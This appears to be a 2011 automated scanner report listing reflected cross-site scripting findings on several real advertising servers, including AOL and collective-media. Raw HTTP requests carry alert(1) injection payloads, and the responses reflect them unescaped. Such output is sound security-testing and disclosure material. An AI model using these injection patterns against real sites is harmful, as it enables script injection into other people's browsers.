HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7367 Date: Sat, 17 Sep 2011 16:48:09 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7367 Date: Sat, 17 Sep 2011 16:48:10 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7347 Date: Sat, 17 Sep 2011 16:48:05 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='121773f9380f32f' ...[SNIP]... ollectiveMedia.creat ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadjbaef0'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7332 Date: Sat, 17 Sep 2011 16:49:32 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7332 Date: Sat, 17 Sep 2011 16:49:32 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7332 Date: Sat, 17 Sep 2011 16:49:33 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7314 Date: Sat, 17 Sep 2011 16:49:27 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='';function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... age="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj54ba1'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7363 Date: Sat, 17 Sep 2011 16:23:43 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7363 Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/1.0.5 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7363 Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /cmadj/q1.q.seattlep |
GET /cmadj/q1.q.seattlep Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optout=1; dc=sea-dc |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Content-Length: 7342 Date: Sat, 17 Sep 2011 16:23:40 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media var cid='1229bf517f8af24' ...[SNIP]... pt">CollectiveMedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:48 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIWB4rEAAAAAGw Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 4359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:47 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIWB4rDAAAAAGo Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 4359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /iframe!t=1089! |
GET /iframe!t=1089!?ct=US&st Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=OPTOUT |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:53 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:43:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... 359;;~aopt=0/ff/34/ff; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adnxs.revsci.net |
Path: | /imp |
GET /imp?Z=728x90d8f31'-alert(1)- Host: adnxs.revsci.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=optout |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:27 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:24:27 GMT Content-Length: 468 document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adnxs.revsci.net |
Path: | /imp |
GET /imp?Z=728x90&s=9374993216d'-alert(1)- Host: adnxs.revsci.net Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=optout |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:24:44 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:24:44 GMT Content-Length: 468 document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.adbrite.com |
Path: | /adserver/vdi/762701 |
GET /adserver/vdi/762701ee6a5<script>alert(1)< Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.gather.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache="168296542x0.096 |
HTTP/1.1 400 Bad Request Accept-Ranges: none Date: Sat, 17 Sep 2011 16:35:32 GMT Server: XPEHb/1.0 Content-Length: 78 Unsupported URL: /adserver/vdi/762701ee6a5<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=504f7"><script>alert(1)< Host: adsfac.us Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSESE002=fpt=0%2C310408 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 365 Content-Type: text/html Expires: Sat, 17 Sep 2011 16:37:26 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FS504f7%22%3E%3Cscript Set-Cookie: FS504f7%22%3E%3Cscript Set-Cookie: UserID=9831083926626 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:26 GMT Connection: close <a href="http://ad.amgdgt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=ETN002.315724 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSESE002=fpt=0%2C310408 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 4241 Content-Type: text/html Expires: Sat, 17 Sep 2011 16:37:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSETN002315724=uid Set-Cookie: FSETN002=pctl=315724&pctm Set-Cookie: UserID=9831083926626 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:33 GMT Connection: close <html><head></head><body> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=ETN002.315724 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSESE002=fpt=0%2C310408 |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 4271 Content-Type: text/html Expires: Sat, 17 Sep 2011 16:37:33 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSETN002315724=uid Set-Cookie: FSETN002=pctl=315724&pctm Set-Cookie: UserID=9831083926626 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:33 GMT Connection: close <html><head></head><body> ...[SNIP]... <a target="_blank" href="http://ad.amgdgt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/0/4/1/ |
GET /a11bc"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/a11bc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/0/4/1/ |
GET /79aaf"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/1/4/1/ |
GET /bff5d"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:30:01 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:30:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/1/4/1/ |
GET /b02af"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:30:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:30:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b02af"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/2/4/1/ |
GET /36906"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:24 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/2/4/1/ |
GET /b1c7f"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
